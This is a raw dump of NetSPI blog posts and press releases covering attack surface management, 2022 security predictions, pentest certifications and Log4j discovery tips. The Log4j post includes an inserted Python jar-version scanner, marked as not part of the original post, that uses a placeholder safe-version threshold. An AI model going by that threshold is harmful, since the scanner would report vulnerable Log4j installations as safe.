How well do all the different capabilities from infrastructure security to monitoring solutions interplay with each other in application security?
What matters most in application security? According to Samir, there isn’t a single solution; you need a comprehensive view across the whole environment. Samir shares examples of solution capabilities he recommends security teams implement, especially if you sell or service solutions for your customers:
Awareness and Education
In-App Protection
Advanced Solutions
Code Analysis
Perimeter Protection
Proactive Solutions
Awareness, education, and code analysis will continue to evolve. Adversaries are always changing the game when it comes to finding vulnerabilities, given the popularity of third-party and open-source components, so there is always a new need to look at different capabilities in this risk context. Solutions that are not only advanced but practical will be increasingly important.
Samir continued, “Shift left-to-right is critical.” To measure the application security program, organizations need to look at the SDLC from one end to the other. From different contexts – how they develop and train their engineers to what they’re seeing on the infrastructure side with solutions that provide visibility into how they’re deploying and the types of attack patterns that target their applications.
Understanding the interplay between these capabilities will help organizations understand what to address and prioritize to drive the effectiveness of their application security program.
A Layered Approach to Application Security Testing
Using the strategies discussed in this blog post and in the webinar, you’ll be able to implement a layered approach to AppSec that will help you build a world-class AppSec program. It starts with learning how to incorporate a risk context across the SDLC, then determining the key timeframes to implement application security testing and understanding how your solution capabilities interplay with one another.
[post_title] => How to Build a Layered Approach to Application Security Testing
[post_excerpt] => Learn best practices from top AppSec experts to help you build a world-class application security testing program.
[post_name] => how-to-build-a-layered-approach-to-application-security-testing
[post_modified] => 2023-01-23 15:10:47
[post_modified_gmt] => 2023-01-23 21:10:47
[guid] => https://www.netspi.com/?p=27549
)
[42] => WP_Post Object
(
[ID] => 27377
[post_author] => 91
[post_date] => 2022-02-22 08:05:00
[post_date_gmt] => 2022-02-22 14:05:00
[post_content] =>
The offering leverages innovative technology and expert pentesters to help organizations discover and secure all assets on the external attack surface.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing, today introduced Attack Surface Management to help secure the expanding, global attack surface. The platform delivers continuous pentesting backed by NetSPI’s global security testing team to help organizations inventory known and unknown internet-facing assets, identify exposures, and prioritize critical risks to their business.
According to Gartner’s Emerging Technologies: Critical Insights for External Attack Surface Management report, analysts recommend attack surface management implementation “as part of a broader, enterprise-wide vulnerability and threat management effort, where known and unknown risks, vulnerabilities and assets are handled as part of a concerted and integrated strategy.”
Attack Surface Management is a core component of NetSPI’s Penetration Testing as a Service (PTaaS) delivery model. It complements the company’s established Penetration Testing and Adversary Simulation technology-powered services to provide an integrated, full suite of offensive security solutions for its customers.
“You don’t know what you don’t know, and what you don’t know can hurt you,” said Travis Hoyt, Chief Technology Officer at NetSPI. “What we have built here is a comprehensive solution to shadow IT and asset management challenges. Attack Surface Management provides an opportunity for organizations to continuously enhance their security posture, improve their penetration testing strategies, and ultimately reduce the probability and impact of a costly cyberattack.”
https://youtu.be/ElP3hKWc55E
Key capabilities of NetSPI’s Attack Surface Management include:
Comprehensive Asset Discovery: NetSPI’s Attack Surface Management technology platform leverages automated scanning and orchestration technology to map, identify, and inventory all assets and improve attack surface visibility.
24/7/365 Continuous Testing: The cloud-native, dynamic application monitors the attack surface continuously and alerts when a high-risk exposure is detected. It provides simplified and always-on attack surface visualization to view your entire external attack surface in a single platform.
Manual Exposure Triaging: The NetSPI Attack Surface Management (ASM) Operations Team triages high-risk exposures to validate the exposure, evaluate the risk it poses to your business, support your team with remediation advisory, and escalate worrisome exposures to our penetration testing team to investigate further.
“The current attack surface management market is reliant on technology. But to find critical exposures that put your organization at risk, human intuition is required,” said Aaron Shilts, CEO at NetSPI. “Our ASM Operations Team is rooted in 20 years of manual penetration testing expertise. We bring a human-centric, strategic approach to the market that will help security leaders get a better handle on their evolving attack surface.”
The Attack Surface Management (ASM) platform also features simple set-up, tracking and trending data over time, asset intelligence, Slack and email integrations, open source intelligence gathering, asset and exposure prioritization, port discovery, and more. For additional details on its capabilities and features, download the attack surface management data sheet.
To learn more or get started with Attack Surface Management, email sales@netspi.com or visit our website.
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform driven, human delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Launches New Attack Surface Management Platform
[post_excerpt] => Learn more about NetSPI's Attack Surface Management solution which leverages innovative technology, continuous penetration testing, and expert pentesters to help organizations discover and secure all assets on the external attack surface and increase attack surface visibility.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => attack-surface-management
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:51
[post_modified_gmt] => 2023-01-23 21:10:51
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27377
[menu_order] => 176
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[43] => WP_Post Object
(
[ID] => 27266
[post_author] => 91
[post_date] => 2022-02-01 11:15:00
[post_date_gmt] => 2022-02-01 17:15:00
[post_content] =>
Amidst a year of rapid growth, NetSPI is recognized for its strong corporate culture.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the top workplaces in the U.S. by Energage – a leading provider of technology-based employee engagement tools. Winners are chosen based on an anonymous third-party employee survey that measures several aspects of workplace culture, including alignment, execution, and connection.
"This recognition by Energage is a true testament to what makes NetSPI a leading, innovative company," said Aaron Shilts, CEO of NetSPI. "Our employees are the heart of our business, working to drive results for our clients, while celebrating our wins together as a team. I’m proud to see NetSPI recognized for our strong culture, as it is the key to what makes our company special."
This Top Workplace recognition follows a year of success and growth for the company. The team brought on more than 100 new employees in 2021, all of whom played a part in achieving 51% organic revenue growth and 100% bookings growth throughout the fiscal year.
"While we’ve grown rapidly over the past year, increasing the size of our team by 50%, we have not lost sight of the elements that make NetSPI a great place to work," said Heather Neumeister, Director of People Operations at NetSPI. "Our employees prioritize collaboration and foster both individual and team growth, creating a culture where everyone is excited to come to work each day."
Top Workplaces USA celebrates organizations with 150 or more employees that have built great cultures. While more than 42,000 organizations were invited to participate, just over 1,100 organizations have been honored with the Top Workplaces USA award this year.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About Energage
Making the world a better place to work together.™ Energage is a purpose-driven company that helps organizations turn employee feedback into useful business intelligence and credible employer recognition through Top Workplaces. Built on 14 years of culture research and the results from 23 million employees surveyed across more than 70,000 organizations, Energage delivers the most accurate competitive benchmark available. With access to a unique combination of patented analytic tools and expert guidance, Energage customers lead the competition with an engaged workforce and an opportunity to gain recognition for their people-first approach to culture. For more information or to nominate your organization, visit Energage or Workplaces.
[post_title] => Energage Names NetSPI a 2022 Top Workplaces USA Winner
[post_excerpt] => Read how NetSPI won the 2022 Top Workplaces USA with its strong corporate culture and significant growth.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => 2022-top-workplaces-usa
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:55
[post_modified_gmt] => 2023-01-23 21:10:55
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27266
[menu_order] => 184
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[44] => WP_Post Object
(
[ID] => 27234
[post_author] => 91
[post_date] => 2022-01-25 08:05:00
[post_date_gmt] => 2022-01-25 14:05:00
[post_content] =>
NetSPI reports a record-high year for growth and momentum, solidifying its role in the evolving security industry.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the achievement of 51% organic revenue growth in fiscal year 2021. This positions NetSPI as a competitive solution in the Penetration Testing as a Service (PTaaS) industry. Additionally, the company partnered with more than 319 new clients and welcomed 119 new employees.
To achieve continued success in 2022, NetSPI appointed financial services industry veteran, Travis Hoyt, as Chief Technology Officer to help drive penetration testing, adversary simulation, and attack surface management product strategy. NetSPI also promoted Alex Jones to the company’s first Chief Revenue Officer, where he will continue driving strategic growth.
“NetSPI’s 100% bookings growth in 2021 was driven by our customer-first approach to implementing meaningful security posture improvements across our client base,” said Aaron Shilts, CEO of NetSPI. “Our talented team of employees has continued to innovate by offering the highest fidelity testing results so clients can easily consume results in real-time and remediate potential threats. As we look to the new year, our team will continue to redefine penetration testing through our platform-driven, human-delivered approach and power clients with services that enable them to be prepared for any vulnerability.”
Achievements that contributed to NetSPI’s success in 2021 include:
$90 Million in Growth Funding: Led by KKR, with participation from Ten Eleven Ventures, the investment will be used to further accelerate NetSPI’s rapid growth. The team will prioritize expanding and investing in product innovation and deepening operations across all markets.
Introduction of Risk Scoring: NetSPI added risk scoring intelligence to its Penetration Testing as a Service (PTaaS) platform to help its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business.
New Ransomware Attack Simulation Service: The new technology-powered service enables organizations to emulate real world ransomware to help continuously improve their ability to detect ransomware attacks.
Discovery of Critical Azure Vulnerability: Practice director Karl Fosaaen discovered a critical misconfiguration in Microsoft Azure which, if exploited, would allow malicious actors to escalate up to a Contributor role in the Azure Active Directory subscription. Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue.
Apache Log4j Assessment: NetSPI leveraged its PTaaS platform to create a robust, targeted assessment that tests client environments for vulnerable Log4j instances. This service uses the power of NetSPI’s technology and penetration testers to find and help remediate the ubiquitous vulnerability across an organization’s attack surface.
IoT Penetration Testing: NetSPI added IoT penetration testing services to its existing suite of capabilities. NetSPI’s new IoT testing services focus on identifying security flaws in ATM, automotive, operational technology, embedded, and medical devices and systems.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs, and technology executives.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Chief Technology Officer Travis Hoyt was accepted into Forbes Technology Council, an invitation-only community for world-class CIOs, CTOs, and technology executives.
Travis was vetted and selected by a review committee based on the depth and diversity of his experience. Criteria for acceptance include a track record of successfully impacting business growth metrics, as well as personal and professional achievements and honors.
“We are honored to welcome Travis into the community,” said Scott Gerber, founder of Forbes Councils, the collective that includes Forbes Technology Council. “Our mission with Forbes Councils is to bring together proven leaders from every industry, creating a curated, social capital-driven network that helps every member grow professionally and make an even greater impact on the business world.”
“It’s exciting to be considered an expert among the impressive group of security and technology leaders on the Forbes Technology Council,” said Travis. “There is a lot we can learn from one another. I’m honored to share insights from my 20+ years in the infosec industry to help others better understand how to leverage offensive security activities and ultimately reduce organizational risk.”
About Forbes Councils
Forbes Councils is a collective of invitation-only communities created in partnership with Forbes and the expert community builders who founded Young Entrepreneur Council (YEC). In Forbes Councils, exceptional business owners and leaders come together with the people and resources that can help them thrive.
[post_title] => NetSPI CTO Travis Hoyt Accepted into Forbes Technology Council
[post_excerpt] => Follow Travis on the Forbes Technology Council for insights on cybersecurity leadership and strategy, penetration testing, blockchain security, and more.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-cto-travis-hoyt-forbes-technology-council
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:56
[post_modified_gmt] => 2023-01-23 21:10:56
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27184
[menu_order] => 189
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[46] => WP_Post Object
(
[ID] => 27044
[post_author] => 91
[post_date] => 2022-01-04 07:00:00
[post_date_gmt] => 2022-01-04 13:00:00
[post_content] =>
And just like that, 2021 has come to a close. We started with SolarWinds and ended with Log4j… cyber adversaries certainly know how to keep us on our toes. In between, Microsoft Exchange, the Florida water plant, JBS, CNA Financial, Kaseya, EA, Colonial Pipeline, among other breach targets made headlines and shook up the security industry.
Each of these pivotal moments may have brought fear, uncertainty, and doubt, but with that also came innovation, a sense of community, and lessons learned. If there’s one thing to take away from the past year, it’s to always reflect on and learn from your experiences – good or bad.
In the name of reflection and moving forward, three NetSPI thought leaders, Travis Hoyt (CTO), Nabil Hannan (Managing Director), and Florindo Gallicchio (Head of Strategic Solutions) came together on a live panel to discuss their cybersecurity predictions for 2022.
Pulling from their decades of experience and daily conversations with some of the most prominent organizations across the globe, they tackled highly debated topics of 2021, from budgets to application security to ransomware. Continue reading to find out what they’re anticipating in the new year.
2022 cybersecurity budgets are going to rebound significantly
“Throughout my career, budgeting has always been a challenge. In 2020 and 2021, security budgets had suffered a pretty big hit primarily due to companies allocating that money to work from home technologies, digital transformation, and business continuity amid the pandemic. And we’re beginning to see those budgets rebound.
While we were cooped up in our houses and locked down at the beginning of the pandemic, the bad guys were not, and they kept busy uncovering egregious vulnerabilities to exploit. We notice now that there's a game of catch-up being played and budgets are being allocated, or re-allocated, back to cybersecurity, penetration testing in particular.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI
CFOs will have more skin in the security game
“For too long, companies have taken a reactionary approach to ransomware attacks – opting to pay, or not pay, after the damage has already been caused. I expect to see CFOs prioritizing conversations surrounding ransomware and cyber insurance within 2022 planning and budgetary meetings to develop a playbook that covers all potential ransomware situations and a corresponding strategy to mitigate both damage and corporate spend. If they don’t lead with proactivity and continue to take a laggard approach to ransomware and cyber insurance, they are leaving their companies at risk for both a serious attack and lost corporate funds. At mature organizations, CFOs are starting to understand that they've got a lot more skin in the game.” – Travis Hoyt, Chief Technology Officer, NetSPI
Cybersecurity insurers will ask deeper, more technical questions
“There’s currently a lack of willingness to underwrite cybersecurity policies. The market is cracking down and underwriters are asking tougher questions. Cybersecurity is not just a line item in a budget, it's not just a percentage of spend against it, it has much more material impact to the business. As you look at the mitigations and activities that you'll need to do with respect to understanding what you have in your environment, your exposures, your vulnerabilities – attack surface management, penetration testing – you’ll also need to look at your control posture. How are your teams responding to incursions? What kind of breach and attack simulation activities are you pursuing? These are the items that underwriters are going to be curious about. It's a much deeper, much more technical set of questions than I have seen them ask historically, and I think it represents the evolution of the market.” – Travis Hoyt, Chief Technology Officer, NetSPI
More organizations will focus on risk in cybersecurity budgeting discussions
“We’ve noticed a heightened focus on a risk approach or risk justification for budgets, over compliance, check-the-box approaches we've seen in the past. Companies are starting to build budget justifications based on risk to the business. In fact, we are seeing more clients take a risk-based approach to cybersecurity spend than before.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI
2022 is the year of API security
“Watching application security, in conjunction with software development, evolve over the last 15 years, we've seen a significantly large uptick in API based architectures. I'm predicting 2022 is going to be the year of the API, where organizations will become serious about securing their APIs.
The Log4j issue arises from a bad habit that software development has fallen into: reusing components without fully understanding the implications. We're also building software with very small bite-sized components that interact with your web applications, your mobile applications, your thermostat at home, your smart car, and other things we rely heavily on. API security is going to get a lot more attention now because organizations are starting to realize how heavily dependent they are on this type of architecture. And you have to be dependent on this type of architecture if you truly want to build systems that are robust and scalable. I expect that API security will become one of the top priorities in the application security space this year.” – Nabil Hannan, Managing Director, NetSPI
The concept of ‘shift left’ will transform into ‘shift everywhere’
“Shift left is a great thought process, and we need to continue doing that. But we also have to start focusing on shifting right. We need to shift everywhere. Thinking of application security holistically will enable you to protect your organization and protect your systems.
Look at technologies beyond web firewalls. Start looking at the viability of RASP solutions. In certain scenarios, start thinking of how to integrate IAST into the QA testing process. All of these activities need to work together. The Log4j issue has highlighted the need to shift right. We need to learn from it and determine the right approach to protect our organizations for the next big vulnerability that comes up.” – Nabil Hannan, Managing Director, NetSPI
SaaS security posture management (SSPM) will be prioritized in 2022
“As organizations continue to become more reliant on SaaS technologies to enable digital transformation efforts, the security perimeter has expanded. Organizations now face a new source of cybersecurity risk as cybercriminals look to exploit misconfigurations or vulnerabilities in these SaaS technologies to wage costly attacks. In 2022, we can expect that organizations will become more focused on SaaS posture management and ensuring that their SaaS footprint is not left open as a vector for cyberattacks. This trend will be further accelerated by the insistence of insurance providers that organizations have a detailed understanding of their SaaS deployments and configurations or face higher premiums or even a refusal of insurance altogether.” - Travis Hoyt, Chief Technology Officer, NetSPI
The blockchain security space will grow in awareness and acumen
“Blockchain is an interesting space on the currency and finance side. But what we're actually seeing is that there are a lot of people that are interested in the underlying technology, the distributed ledger technology. There are a lot of organizations, or consortiums, that are starting to leverage this technology to solve a variety of problems that allow them to interact in ways that perhaps they would not have been able to do - or do efficiently - in the past.
It's one of those things that security teams are going to have to start paying attention to. While there are overlaps with respect to the security testing methodologies, there are some unique differences that will change your operating and security processes, especially when you're deploying them in a distributed fashion. My prediction is that we will see the blockchain security space start to grow in 2022.
It's going to be a very compelling and interesting story. The acumen for attacking this technology by threat actors is already well cultivated. What we don't have is the same measure of acumen cultivation by the defenders. My call to action is, if this technology is going to be in play in your space, then you need to make sure that your teams understand how it operates, where it's unique, how it's unique, and what you need to defend it effectively and get that acumen development in place.” – Travis Hoyt, Chief Technology Officer, NetSPI
Company culture could solve the cybersecurity hiring crisis
“It’s no secret that cybersecurity, like many industries, is facing a hiring crisis. The Great Resignation we’re seeing across the country has underscored a growing trend spurred by the COVID-19 pandemic: employees will leave their company if it cannot effectively meet their needs or fit into their lifestyle. From a retention perspective, I expect to see department heads fostering a culture that’s built on principles like performance, accountability, caring, communication, and collaboration. Once this team-based viewpoint is established, employees will take greater pride in their work, producing positive results for their teams, the company and themselves – ultimately driving positive retention rates across the organization.” – Charles Horton, Chief Operations Officer, NetSPI [note: Charles was unable to attend the webinar, Nabil shared this prediction on his behalf]
The skills shortage will continue until hiring practices change
“In 2022 the cybersecurity skills gap will persist, but organizations that take a realistic approach to cybersecurity hiring and make a commitment to building cybersecurity talent from the ground up will find the most success in addressing it. The focus in closing the skills gap often relies on educating a new generation of cybersecurity professionals through universities and trade programs, and generally encouraging more interest in young professionals joining the field. In reality, these programs will only have limited success. The real culprit behind the skills gap is that organizations often maintain unrealistic hiring practices, with cybersecurity degrees and certification holders often finding untenable job requirements such as 3+ years of experience for an entry level job.” – Nabil Hannan, Managing Director, NetSPI
[post_title] => New Year, New Trends: 2022 Cybersecurity Predictions
[post_excerpt] => Our experts reveal their security industry predictions for 2022, from cybersecurity budgets to application security to ransomware.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => 2022-cybersecurity-trends-predictions
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:59
[post_modified_gmt] => 2023-01-23 21:10:59
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27044
[menu_order] => 195
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[47] => WP_Post Object
(
[ID] => 26983
[post_author] => 91
[post_date] => 2021-12-21 07:00:00
[post_date_gmt] => 2021-12-21 13:00:00
[post_content] =>
The first step to remediating Log4j vulnerabilities? Discovery.
Identifying Apache Log4j usage at scale in any environment can be a challenge. Generally, we're seeing companies struggle to develop comprehensive strategies to identify the vulnerability accurately across their entire environment. Getting real coverage involves reviewing all assets from both an authenticated and unauthenticated perspective, and often requires additional collaboration with business units and development teams. In some cases, this can be a challenge when there are "black boxes" on their networks that have no clear owner.
To help you get started, we’ve pulled together five discovery tips to identify vulnerable instances of Log4j. For additional detail and best practices for discovery, download our tip sheet: 5 Strategies for Log4j Vulnerability Identification.
Perform both internal and external network scanning using common vulnerability scanners, such as Nmap or Nessus. Most of the Apache Log4j plugins used by vulnerability scanners only test a small subset of common HTTP headers, but they still provide basic coverage. To provide more comprehensive coverage, also perform focused web application testing. Create an inventory of externally and internally available web applications.
Leverage existing security or configuration management tooling to search systems for files that are unique to Log4j. Then, follow up on positive matches to determine if they are running a vulnerable version of Apache Log4j. The files can be downloaded online: https://logging.apache.org/log4j/2.x/index.html.
Reach out to vendors to determine if vulnerable Apache Log4j versions are being used for applications that were not developed by your company that have already been deployed to the environment.
Collaborate with internal business units and development groups to determine if vulnerable Apache Log4j versions are being used by internally developed applications.
Prioritize additional testing based on company-defined risk. Testing should focus on mapping the web application's attack surface and testing all identifiable dynamic elements, such as common HTTP headers, parameters (GET, POST, JSON), and cookies.
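Tip two above (search systems for files unique to Log4j, then follow up on matches to establish the version), as an added example that is not NetSPI's tooling or part of the original post: a Python scanner that walks a directory tree for Log4j 2 core jars, including copies nested inside war/ear/jar archives and shaded or renamed jars that still carry the JndiLookup class, reads the version from the jar manifest, and flags anything below a safe-version threshold. The threshold "2.5.0", the sample versions and the file layout are constructed placeholders; the real threshold comes from the Apache Log4j advisory linked above.

```python
import io
import pathlib
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Optional

# Filename pattern of the Log4j 2 core jar, e.g. log4j-core-2.14.1.jar
LOG4J_CORE_RE = re.compile(r"log4j-core-(\d+(?:\.\d+)*)[^/]*\.jar$", re.IGNORECASE)
# Class shipped only in log4j-core: identifies shaded or renamed copies
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")

@dataclass
class Finding:
    path: str               # nested archive entries are joined with "!"
    version: Optional[str]  # manifest or filename version, None if undetermined
    status: str             # "vulnerable", "ok" or "unknown" (manual follow-up)

def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); pre-release suffixes such as '-rc1' are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text.split("-")[0]))

def manifest_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "implementation-version":
            return value.strip() or None
    return None

def classify(version: Optional[str], min_safe: str) -> str:
    """Below the safe threshold is vulnerable; no version means a human must check."""
    if version is None:
        return "unknown"
    return "vulnerable" if parse_version(version) < parse_version(min_safe) else "ok"

def scan_archive(data: bytes, path: str, min_safe: str, findings: list) -> None:
    """Inspect one archive held in memory and recurse into archives nested in it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        name_match = LOG4J_CORE_RE.search(path)
        if name_match or JNDI_LOOKUP_CLASS in names:
            version = manifest_version(zf) or (name_match.group(1) if name_match else None)
            findings.append(Finding(path, version, classify(version, min_safe)))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXTS):
                scan_archive(zf.read(name), f"{path}!{name}", min_safe, findings)

def scan_tree(root: str, min_safe: str) -> list:
    """Walk root and return a Finding for every Log4j core jar, nested or not."""
    findings = []
    for p in sorted(pathlib.Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_EXTS:
            scan_archive(p.read_bytes(), str(p), min_safe, findings)
    return findings

def make_jar(version: Optional[str] = None, entries=()) -> bytes:
    """Constructed in-memory jar for the demo; not a real Log4j artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        manifest = "Manifest-Version: 1.0\n"
        if version:
            manifest += f"Implementation-Version: {version}\n"
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        for name, payload in entries:
            zf.writestr(name, payload)
    return buf.getvalue()

def build_sample_tree(root: str) -> None:
    """Constructed layout: a plain core jar, one nested inside a .war, and a
    shaded vendor jar whose name hides Log4j but still carries JndiLookup.class."""
    app = pathlib.Path(root) / "app"
    (app / "lib").mkdir(parents=True)
    core = [(JNDI_LOOKUP_CLASS, b"")]
    (app / "lib" / "log4j-core-2.3.0.jar").write_bytes(make_jar("2.3.0", core))
    (app / "lib" / "vendor-bundle.jar").write_bytes(make_jar(None, core))
    nested = [("WEB-INF/lib/log4j-core-2.9.0.jar", make_jar("2.9.0", core))]
    (app / "webapp.war").write_bytes(make_jar(None, nested))

def demo(min_safe: str = "2.5.0") -> dict:
    """Scan the constructed tree; min_safe is a placeholder, not a real Log4j version."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        findings = scan_tree(root, min_safe)
    return {f.path[len(root):].replace("\\", "/"): (f.version, f.status) for f in findings}

if __name__ == "__main__":
    for path, (version, status) in demo().items():
        print(f"{status:10s} {version or '?':8s} {path}")
```

A jar that matches only by class and carries no manifest version lands in the "unknown" bucket, which is exactly the manual follow-up the tip calls for rather than a silent pass.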
Log4j is another example of attackers targeting software that's integrated into core IT supply chains. However, Log4j represents a much greater risk than some of its predecessors, because it’s widely associated with multiple operating systems and websites exposed to the internet. As a result, attackers are scrambling to use it as quickly as possible to gain a foothold in environments and leverage it to deploy sophisticated attacks, such as ransomware. I think this will be the first of many breakouts that target, not common software packages, but their dependencies/third party components.
Time is critical in this situation, and vulnerability discovery is the first step to protecting your organization from exploitation. Connect with NetSPI to learn how we can help you with our Log4j Vulnerability Assessment: https://www.netspi.com/contact-us/.
On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO. Read the full article below or online here.
+++
Penetration testing, sometimes called ethical hacking or red team hacking, is an exciting career path in which you simulate cyberattacks on target systems in order to test (and, ultimately, improve) their security. It's a job that lots of people currently working in infosec would like to have, and one that can be tricky to get as competition heats up.
"It used to be the best way to grow a career in attack and penetration was through hands-on experience," says Matthew Eidelberg, technical manager for threat management at Optiv. "It’s becoming harder and harder to break into pen testing as a beginner, because these roles are no longer considered niche. They are in high demand. As a result, a lot of effort has gone into certifications based on training and real-world lab simulations for both students and professionals."
In fact, a range of penetration testing certifications are now available from various companies and industry organizations—and earning these certs can boost your career prospects, says Ron Delfine, director of career services at Carnegie Mellon University's Heinz College. "Depending on what skills an organization is seeking," he says, "certification holders may have a competitive advantage related to career advancement, as they have already been through a proven process requiring them to display evidence of strong penetration testing skills through the certification and recertification process."
Top penetration testing certifications
How can you pick the best penetration testing certification for you? We spoke to a number of pen testing pros to see how different certifications have helped their careers or helped them find good candidates when they were hiring. In general, most of the people we spoke to grouped certs offered by the same orgs together, so that's how we'll treat them here too.
GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)
EC-Council Certified Ethical Hacker (CEH)
EC-Council Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master)
CompTIA PenTest+
. . .
EC-Council
The EC-Council is a cybersecurity education and training nonprofit founded in the wake of the 9/11 attacks, and Certified Ethical Hacker (CEH) is perhaps their highest-profile cert—in fact, it's one of the best-known certifications in the field. The EC-Council recently launched a twinned pair of certs, Certified Penetration Testing Professional (CPENT) and Licensed Penetration Tester (LPT Master), that are based on the same training material and exam, with the LPT Master going to those who score best on the test.
CEH is relatively well known, and the security pros we spoke to note that it has its place in the field, but they were less enthusiastic about it than they were about certs from GIAC or Offensive Security. "I would note CEH as a ‘foot-in-the-door’ certification for a pen testing internship or in preparation for additional study," says Melissa Miller, managing security consultant at NetSPI. Critical Start's Rhoads-Herrera calls it "valuable as a good way to get past HR screeners" but adds that "the course work is not up to par with other certifications."
"CEH does qualify you for a number of contracts by virtue of being one of the oldest in the game," says Pluralsight's Rosenmund, "but doesn’t necessarily ensure from an employer perspective that you are ready to do the job." Counter Hack Challenges' Elgee gives a specific example: "CEH is most valuable for checking specific certification boxes, especially in US government," but says it "otherwise has a low value to price ratio."
Certified Ethical Hacker (CEH):
Prerequisites: You must either take an EC-Council-approved CEH training course or establish that you have at least two years of professional infosec experience before you can take the exam.
Test format: Four hours, 125 multiple-choice questions. If you pass this exam, you can also take the Certified Ethical Hacker Practical exam (six hours, 20 practical challenges) to earn CEH Master certification.
Cost: The exam costs $1,199 plus $100 for remote proctoring; there is a $100 nonrefundable application fee, and official training courses cost anywhere from $850 to $2,999.
Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master):
Prerequisites: Candidates must have already received CEH and Certified Security Analyst certs from the EC-Council, and submit an application that includes a criminal background check. The exam is meant to follow on from the EC-Council's CPENT training course, although experienced pen testers can request to "challenge" the exam based on their existing skills.
Test format: A 24-hour online practical exam in which you deploy advanced pen-testing techniques. A score of 90% or above earns the LPT Master certification; 70% to 90% earns CPENT.
Cost: The CPENT course is $2,199, which includes the exam and access to the EC-Council's practice range and other content. There is also a $500 application fee (which covers the background check).
[post_title] => CSO: 8 top penetration testing certifications employers value
[post_excerpt] => On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO.
[guid] => https://www.netspi.com/?p=26981
)
[49] => WP_Post Object
(
[ID] => 26964
[post_date] => 2021-12-13 13:14:00
[post_content] =>
On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost. Read the full article below or online here.
+++
What some call the worst cybersecurity catastrophe of the year – the Apache Log4j logging library exploit – has spun off 60 bigger mutations in less than a day, researchers said.
The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.
